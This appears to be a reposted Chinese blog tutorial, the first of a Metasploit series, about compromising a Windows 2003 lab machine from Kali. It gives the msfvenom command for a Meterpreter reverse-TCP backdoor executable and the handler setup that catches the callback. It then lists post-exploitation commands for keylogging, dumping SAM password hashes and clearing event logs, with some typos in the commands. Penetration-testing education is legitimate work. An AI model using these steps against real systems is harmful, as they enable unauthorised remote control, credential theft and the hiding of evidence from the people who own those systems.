metasploit渗透第一篇

来源:互联网 发布:php视频推荐 编辑:程序博客网 时间:2024/05/23 20:25

版权声明:本文为博主原创文章,转载必须写明出处。


通过metasploit 框架反弹shell


或许我不是第一个上传metasploit 框架反弹shell的,因为我没有走在最前头,但是我想通过这种方式希望有更多人加入,这样才能学到更多的知识![metasploit 框架](http://book.51cto.com/art/201309/410435.htm)

接下来我通过kali实现对win2003的渗透:
步骤流程:

  1. kali生成后门
  2. win 2003运行后门
  3. 监听后门
  4. 进入后门
  5. 操作靶机

Hosts: kali查看连接靶机

渗透机:kali ip:192.168.254.100
靶机:win 2003 ip:192.168.254.101

1.文件目录:C://user/metasploit/
a)config:配置文件目录:basedate.b 数据库文件
b)modules:模块文件

2.msfvenom
msfvenom是msfpayload,msfencode的结合体,可利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线

metasploit-framework旗下的msfpayload(荷载生成器),msfencoder(编码器),msfcli(监听接口)已然成为历史,取而代之的是msfvenom。

一,msfvenom生成payload的常见格式为:

> root@localhost:~# msfvenom -h    > root@localhost:~# msfvenom -l> payloads  载荷列表    > root@localhost:~# msfvenom -l encoders> root@localhost:~# msfvenom -l nops

nops选项(空字段模块/一切为了绕过和免杀)

二,以反弹回meterpreter会话的payload为例:window/meterpreter/reverse_tcp
打开命令行:

> msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101> LPORT=4444 -f exe -o payload.exe

LHOST=192.168.1.101:渗透机ip
LPORT=4444:监听端口
-p:指定载荷
-o:输出参数可以用“>”号代替 ,生成文件
-f:指定格式参数

3.msfconsole本地监听

把生成的payload.exe放到下win 2003执行.

root # msfconsole本机监听,因为之前用的是reverse_tcp,所以设置如下root # msf > use exploit/multi/handlermsf exploit(handler) > show payloads载荷列表,所有的载荷都在里面msf11exploit(handler) > set payload windows/meterpreter/reverset_tcp设置载荷msf exploit(handler) > show options查看可设置参数msf exploit(handler) > set lhost 192.168.254.100选择监听ipmsf exploit(handler) > set lport 4444选择监听端口msf exploit(handler) > exploit开启监听Jobs:退出监听msf exploit(handler) > sessions -l  查看已经成功获取的会话msf exploit(handler) > sessions -i 1    连接到指定序号的meterpreter会话已继续利用

4.Metasploit成功拿到shell后门
当我们成功拿到shell后门时,我们会发现我们的命令会进入meterpreter > 而不是msf exploit(handler) >,这时我们就能简单的操作对方的主机了,比如:

sysinfo     显示目标系统信息backround   退出目标系统,回到Metasploit主界面ps      显示目标系统上的进程keyscan_start   监控目标系统键盘输入,停止监控为keyscan_stopMigrate     将你的Meterpreter移到另一个进程先用PS命令查看进程后,得到进程ID,然后在执行Migrate (进程ID)Ipconfig    显示对方网络信息Getuid      获取用户的服务器运行Shell       进入目标电脑,命令提示符Idletime    目标电脑闲置了多长时间Hashdump    导出对方SAM数据库里的内容Clearev     清除事件日志netstat -ano    查看开启端口[Metasploit的基本命令](http://www.91ri.org/8476.html)

metasploit渗透第二篇